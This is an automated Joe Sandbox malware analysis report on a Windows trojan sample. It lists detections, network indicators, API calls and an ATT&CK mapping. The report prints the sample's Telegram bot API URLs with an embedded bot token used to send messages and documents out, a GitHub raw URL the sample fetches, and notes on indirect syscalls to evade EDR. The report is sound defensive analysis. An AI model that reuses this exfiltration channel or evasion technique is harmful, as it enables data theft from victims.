Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c9toH15OT0.exe

Overview

General Information

Sample name:c9toH15OT0.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:1ce88179cf309cf721fbd5f924bbe02adf339971d4b7722facdae4b6dd8be42d
Analysis ID:1578689
MD5:6a5ec7f2c5ea9831b81c7e637c5ecd9f
SHA1:56eb825c85698d459605aab6d375d8680ba22402
SHA256:1ce88179cf309cf721fbd5f924bbe02adf339971d4b7722facdae4b6dd8be42d
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains more sections than normal
PE file contains sections with non-standard names
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • c9toH15OT0.exe (PID: 1368 cmdline: "C:\Users\user\Desktop\c9toH15OT0.exe" MD5: 6A5EC7F2C5EA9831B81C7E637C5ECD9F)
    • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: c9toH15OT0.exeAvira: detected
Source: c9toH15OT0.exeVirustotal: Detection: 50%Perma Link
Source: c9toH15OT0.exeReversingLabs: Detection: 66%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65468A590 BCryptGenRandom,VirtualProtect,0_2_00007FF65468A590
Source: c9toH15OT0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654521DC0 memcpy,closesocket,WakeByAddressSingle,WakeByAddressSingle,WSAIoctl,WSAGetLastError,WSAIoctl,WSAGetLastError,WSAIoctl,WSAGetLastError,WSAIoctl,WSAGetLastError,WakeByAddressSingle,recv,WSAGetLastError,send,WSAGetLastError,WSASend,WSAGetLastError,0_2_00007FF654521DC0
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: c9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000002.1732037783.0000029B0D9AE000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1715780191.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731584762.0000029B0D9A7000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731365365.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731732450.0000029B0D9AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: c9toH15OT0.exeString found in binary or memory: https://api.ipify.orgsrc/main.rs%
Source: c9toH15OT0.exeString found in binary or memory: https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977
Source: c9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessage
Source: c9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessageR
Source: c9toH15OT0.exeString found in binary or memory: https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.te
Source: c9toH15OT0.exeString found in binary or memory: https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt
Source: c9toH15OT0.exeString found in binary or memory: https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt%
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654403640 memcpy,GetQueuedCompletionStatusEx,WakeByAddressSingle,GetLastError,WakeByAddressSingle,WakeByAddressSingle,NtDeviceIoControlFile,RtlNtStatusToDosError,WakeByAddressSingle,WakeByAddressSingle,0_2_00007FF654403640
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654406970 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,0_2_00007FF654406970
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654403640: memcpy,GetQueuedCompletionStatusEx,WakeByAddressSingle,GetLastError,WakeByAddressSingle,WakeByAddressSingle,NtDeviceIoControlFile,RtlNtStatusToDosError,WakeByAddressSingle,WakeByAddressSingle,0_2_00007FF654403640
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544036400_2_00007FF654403640
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544F32C00_2_00007FF6544F32C0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65452B4600_2_00007FF65452B460
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654521DC00_2_00007FF654521DC0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543ACE850_2_00007FF6543ACE85
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451DA000_2_00007FF65451DA00
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654519C800_2_00007FF654519C80
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545125600_2_00007FF654512560
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65439D5600_2_00007FF65439D560
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544B56000_2_00007FF6544B5600
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545305C00_2_00007FF6545305C0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451D5D00_2_00007FF65451D5D0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545635D00_2_00007FF6545635D0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544F67800_2_00007FF6544F6780
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543D07A00_2_00007FF6543D07A0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544107A00_2_00007FF6544107A0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545627900_2_00007FF654562790
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543AB7FD0_2_00007FF6543AB7FD
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544F88300_2_00007FF6544F8830
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545299200_2_00007FF654529920
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543D79100_2_00007FF6543D7910
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A192F0_2_00007FF6543A192F
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543998D00_2_00007FF6543998D0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544B01400_2_00007FF6544B0140
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543BE1700_2_00007FF6543BE170
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543AD2130_2_00007FF6543AD213
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543B72600_2_00007FF6543B7260
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543B63100_2_00007FF6543B6310
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543E73A00_2_00007FF6543E73A0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A13500_2_00007FF6543A1350
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451D4100_2_00007FF65451D410
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545264900_2_00007FF654526490
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544F45100_2_00007FF6544F4510
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543B64F00_2_00007FF6543B64F0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6545444D00_2_00007FF6545444D0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544874E00_2_00007FF6544874E0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654571D400_2_00007FF654571D40
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654526D500_2_00007FF654526D50
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A7DFA0_2_00007FF6543A7DFA
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543B0DD10_2_00007FF6543B0DD1
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543E4DD00_2_00007FF6543E4DD0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543ADE990_2_00007FF6543ADE99
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543ACF270_2_00007FF6543ACF27
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543ACEB90_2_00007FF6543ACEB9
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543CEED00_2_00007FF6543CEED0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A6FA00_2_00007FF6543A6FA0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6544B0F700_2_00007FF6544B0F70
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543BBFD00_2_00007FF6543BBFD0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65439A0900_2_00007FF65439A090
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A41070_2_00007FF6543A4107
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65439C95D0_2_00007FF65439C95D
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543BEA100_2_00007FF6543BEA10
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543AAA080_2_00007FF6543AAA08
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451EA300_2_00007FF65451EA30
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543C19EE0_2_00007FF6543C19EE
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543CDA800_2_00007FF6543CDA80
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654544A400_2_00007FF654544A40
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654530B200_2_00007FF654530B20
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654571AC00_2_00007FF654571AC0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543B8B800_2_00007FF6543B8B80
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543BBB900_2_00007FF6543BBB90
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451EBB00_2_00007FF65451EBB0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654410BA00_2_00007FF654410BA0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65454EC000_2_00007FF65454EC00
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A0BF00_2_00007FF6543A0BF0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451ACA00_2_00007FF65451ACA0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654499C800_2_00007FF654499C80
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543C7CD00_2_00007FF6543C7CD0
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: String function: 00007FF6543B93D0 appears 120 times
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: String function: 00007FF6543BC8C0 appears 233 times
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: String function: 00007FF6543BC4C0 appears 44 times
Source: c9toH15OT0.exeStatic PE information: Number of sections : 11 > 10
Source: c9toH15OT0.exeBinary string: C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\afd.rs\Device\Afd\Mio
Source: c9toH15OT0.exeBinary string: Failed to open \Device\Afd\Mio:
Source: classification engineClassification label: mal68.troj.evad.winEXE@2/0@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: c9toH15OT0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\c9toH15OT0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: c9toH15OT0.exeVirustotal: Detection: 50%
Source: c9toH15OT0.exeReversingLabs: Detection: 66%
Source: unknownProcess created: C:\Users\user\Desktop\c9toH15OT0.exe "C:\Users\user\Desktop\c9toH15OT0.exe"
Source: C:\Users\user\Desktop\c9toH15OT0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeSection loaded: fwpuclnt.dllJump to behavior
Source: c9toH15OT0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: c9toH15OT0.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: c9toH15OT0.exeStatic file information: File size 3121152 > 1048576
Source: c9toH15OT0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1f3400
Source: c9toH15OT0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: c9toH15OT0.exeStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\c9toH15OT0.exeAPI coverage: 2.9 %
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF6543A8DEA GetSystemInfo,0_2_00007FF6543A8DEA
Source: c9toH15OT0.exe, 00000000.00000003.1715780191.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731584762.0000029B0D9A7000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731365365.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731732450.0000029B0D9AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF654391180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00007FF654391180
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65468A828 SetUnhandledExceptionFilter,0_2_00007FF65468A828
Source: C:\Users\user\Desktop\c9toH15OT0.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\c9toH15OT0.exeNtDeviceIoControlFile: Indirect: 0x7FF6544044EAJump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeNtCreateFile: Indirect: 0x7FF6544069F7Jump to behavior
Source: C:\Users\user\Desktop\c9toH15OT0.exeCode function: 0_2_00007FF65451A980 WSASocketW,WSAGetLastError,WSASocketW,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,WSAGetLastError,0_2_00007FF65451A980
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism
1
Process Injection
LSASS Memory1
System Network Configuration Discovery
Remote Desktop ProtocolData from Removable Media22
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Abuse Elevation Control Mechanism
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeylogging2
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
c9toH15OT0.exe51%VirustotalBrowse
c9toH15OT0.exe67%ReversingLabsWin64.Trojan.Generic
c9toH15OT0.exe100%AviraTR/Agent_AGen.yhjcx
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    high
    api.telegram.org
    149.154.167.220
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.ipify.org/c9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000002.1732037783.0000029B0D9AE000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1715780191.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731584762.0000029B0D9A7000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731365365.0000029B0D9A4000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731732450.0000029B0D9AB000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txtc9toH15OT0.exefalse
          high
          https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessageRc9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt%c9toH15OT0.exefalse
              high
              https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.tec9toH15OT0.exefalse
                high
                https://api.ipify.orgsrc/main.rs%c9toH15OT0.exefalse
                  unknown
                  https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagec9toH15OT0.exe, 00000000.00000002.1731923789.0000029B0D97F000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731694200.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmp, c9toH15OT0.exe, 00000000.00000003.1731638303.0000029B0D97E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977c9toH15OT0.exefalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      149.154.167.220
                      api.telegram.orgUnited Kingdom
                      62041TELEGRAMRUfalse
                      104.26.12.205
                      api.ipify.orgUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1578689
                      Start date and time:2024-12-20 04:19:40 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:c9toH15OT0.exe
                      (renamed file extension from none to exe, renamed because original name is a hash value)
                      Original Sample Name:1ce88179cf309cf721fbd5f924bbe02adf339971d4b7722facdae4b6dd8be42d
                      Detection:MAL
                      Classification:mal68.troj.evad.winEXE@2/0@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Stop behavior analysis, all processes terminated
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      No simulations
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.2209KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                  _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                        Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                          • api.ipify.org/?format=text
                                          xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                          • api.ipify.org/
                                          GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                          • api.ipify.org/
                                          8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                          • api.ipify.org/
                                          Simple2.exeGet hashmaliciousUnknownBrowse
                                          • api.ipify.org/
                                          Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                          • api.ipify.org/
                                          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                          • api.ipify.org/
                                          6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                          • api.ipify.org/
                                          perfcc.elfGet hashmaliciousXmrigBrowse
                                          • api.ipify.org/
                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                          • api.ipify.org/
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          api.ipify.orghttps://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.74.152
                                          billys.exeGet hashmaliciousMeduza StealerBrowse
                                          • 172.67.74.152
                                          ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.13.205
                                          DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.74.152
                                          iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.12.205
                                          script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.12.205
                                          script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.12.205
                                          WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                          • 104.26.12.205
                                          cali.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          api.telegram.org9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
